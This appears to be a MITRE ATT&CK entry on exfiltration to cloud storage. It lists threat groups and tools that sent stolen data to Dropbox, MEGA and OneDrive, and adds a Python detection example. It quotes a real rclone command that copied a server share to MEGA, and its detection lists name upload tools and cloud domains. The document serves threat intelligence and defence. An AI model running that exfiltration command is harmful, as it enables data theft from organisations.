T1567.002 Exfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data on a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
Item | Value |
---|---|
ID | T1567.002 |
Sub-techniques | T1567.001, T1567.002, T1567.003 |
Tactics | TA0010 |
Platforms | Linux, Windows, macOS |
Version | 1.1 |
Created | 09 March 2020 |
Last Modified | 30 August 2022 |
Procedure Examples
ID | Name | Description |
---|---|---|
S0635 | BoomBox | BoomBox can upload data to dedicated per-victim folders in Dropbox.[14] |
S0651 | BoxCaon | BoxCaon has the capability to download folders’ contents on the system and upload the results back to its Dropbox drive.[7] |
C0015 | C0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.[1] |
G0114 | Chimera | Chimera has exfiltrated stolen data to OneDrive accounts.[24] |
S0660 | Clambling | Clambling can send files from a victim’s machine to Dropbox.[10][11] |
G0142 | Confucius | Confucius has exfiltrated victim data to cloud storage service accounts.[18] |
S1023 | CreepyDrive | CreepyDrive can use cloud services including OneDrive for data exfiltration.[4] |
S0538 | Crutch | Crutch has exfiltrated stolen data to Dropbox.[13] |
G1006 | Earth Lusca | Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.[19] |
S0363 | Empire | Empire can use Dropbox for data exfiltration.[3] |
G0046 | FIN7 | FIN7 has exfiltrated stolen data to the MEGA file sharing site.[15] |
G0125 | HAFNIUM | HAFNIUM has exfiltrated data to file sharing sites, including MEGA.[17] |
S0037 | HAMMERTOSS | HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.[12] |
G1001 | HEXANE | HEXANE has used cloud services, including OneDrive, for data exfiltration.[4] |
G0094 | Kimsuky | Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.[16] |
G0065 | Leviathan | Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[20][21] |
G1014 | LuminousMoth | LuminousMoth has exfiltrated data to Google Drive.[26] |
S0340 | Octopus | Octopus has exfiltrated data to file sharing sites.[5] |
C0022 | Operation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of the open-source command-line tool dbxcli to exfiltrate stolen data to Dropbox.[27][28] |
G1005 | POLONIUM | POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.[4] |
S0629 | RainyDay | RainyDay can use a file exfiltration tool to upload specific files to Dropbox.[6] |
S1040 | Rclone | Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.[2][1] |
S0240 | ROKRAT | ROKRAT can send collected data to cloud storage services such as PCloud.[8][9] |
G0027 | Threat Group-3390 | Threat Group-3390 has exfiltrated stolen data to Dropbox.[10] |
G0010 | Turla | Turla has used WebDAV to upload stolen USB files to a cloud drive.[22] Turla has also exfiltrated stolen files to OneDrive and 4shared.[23] |
G0128 | ZIRCONIUM | ZIRCONIUM has exfiltrated stolen data to Dropbox.[25] |
Mitigations
ID | Mitigation | Description |
---|---|---|
M1021 | Restrict Web-Based Content | Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services. |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Access |
DS0029 | Network Traffic | Network Connection Creation |
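The Command Execution and Network Connection Creation data components above can be turned into concrete detection logic. The following is an added example, not part of ATT&CK or any of the cited reports: it scores constructed process-creation and flow records, matching the cloud-storage uploaders named in the procedure examples (rclone, megacmd, dbxcli) on hosts that policy does not allow to upload, and large outbound volume to cloud-storage domains. The domain list, the field layout of the events, and the host allowlist are assumptions.

```python
import re
from typing import List, Optional
# Cloud-storage endpoints and upload CLIs named in the procedure examples above; both
# lists are assumptions made for this example, not an official ATT&CK list.
CLOUD_STORAGE_DOMAINS = ("dropbox.com", "mega.nz", "mega.co.nz", "drive.google.com",
                         "onedrive.live.com", "4shared.com", "pcloud.com", "blogspot.com")
# rclone uploads look like "rclone <copy|sync|move> <src> <remote>:<path>"; remote names are
# user-defined, so match the shape, requiring 2+ chars so "D:\backups" is not taken as a remote.
RCLONE_UPLOAD = re.compile(r"\brclone(?:\.exe)?\b.*\b(copy|sync|move)\b.*\s([A-Za-z0-9_-]{2,}):", re.I)
OTHER_UPLOADERS = re.compile(r"\b(mega-put|megacmd|dbxcli)(?:\.exe)?\b", re.I)
ALLOWED_UPLOAD_HOSTS = {"backup01"}  # hosts the proxy/endpoint policy permits to upload

def score_process_event(line: str) -> Optional[str]:
    """Command Execution: flag cloud uploaders on hosts not permitted to use them."""
    host, user, image, cmd = line.split("|", 3)
    if host.lower() in ALLOWED_UPLOAD_HOSTS:
        return None
    m = RCLONE_UPLOAD.search(cmd)
    if m:
        reasons = [f"rclone {m.group(1).lower()} to remote '{m.group(2)}'"]
        if re.search(r"--(?:transfers|multi-thread-streams)\s+\d+", cmd):
            reasons.append("--transfers/--multi-thread-streams set")
        if re.search(r"--bwlimit\s+\S+", cmd):
            reasons.append("--bwlimit set")
        return f"{host}: " + "; ".join(reasons)
    m = OTHER_UPLOADERS.search(cmd)
    return f"{host}: cloud uploader {m.group(1).lower()} run by {user}" if m else None

def score_network_event(line: str, min_bytes: int = 50_000_000) -> Optional[str]:
    """Network Connection Creation: flag large outbound volume to cloud storage."""
    host, image, dest, port, sent = line.split("|")
    if host.lower() in ALLOWED_UPLOAD_HOSTS:
        return None
    if int(sent) >= min_bytes and any(dest == d or dest.endswith("." + d) for d in CLOUD_STORAGE_DOMAINS):
        return f"{host}: {image} sent {int(sent) // 1_000_000} MB to {dest}:{port}"
    return None

# Constructed sample telemetry: "host|user|image|command_line" process events (the first
# is the C0015 rclone command) and "host|image|dest_host|dest_port|bytes_out" flow events.
SAMPLE_PROCESS_EVENTS = [
    r'FS01|svc_backup|rclone.exe|rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M',
    r'WS12|jdoe|dbxcli.exe|dbxcli put C:\Users\jdoe\docs.zip /stash/docs.zip',
    r'BACKUP01|svc_backup|rclone.exe|rclone.exe sync D:\backups offsite:nightly',
]
SAMPLE_NETWORK_EVENTS = ["FS01|rclone.exe|g.api.mega.co.nz|443|734000000",
                         "WS07|chrome.exe|www.dropbox.com|443|120000"]

def run() -> List[str]:
    hits = [r for r in map(score_process_event, SAMPLE_PROCESS_EVENTS) if r]
    return hits + [r for r in map(score_network_event, SAMPLE_NETWORK_EVENTS) if r]
```

In a real deployment the allowlist and volume threshold would come from the web proxy policy referenced under M1021, so that sanctioned backup hosts do not generate alerts while any other host reaching the same services does.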
References
- [1] DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
- [2] Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
- [3] Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
- [4] Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
- [5] Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
- [6] Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
- [7] CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
- [8] Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
- [9] Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
- [10] Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
- [11] Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
- [12] FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
- [13] Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
- [14] MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
- [15] Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
- [16] An, J. and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
- [17] MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
- [18] Lunghi, D. and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group’s Cyberespionage Operations. Retrieved December 26, 2021.
- [19] Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
- [20] Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
- [21] FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- [22] Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
- [23] Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
- [24] Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.
- [25] Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.
- [26] Botezatu, B. et al. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
- [27] Breitenbacher, D. and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
- [28] ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.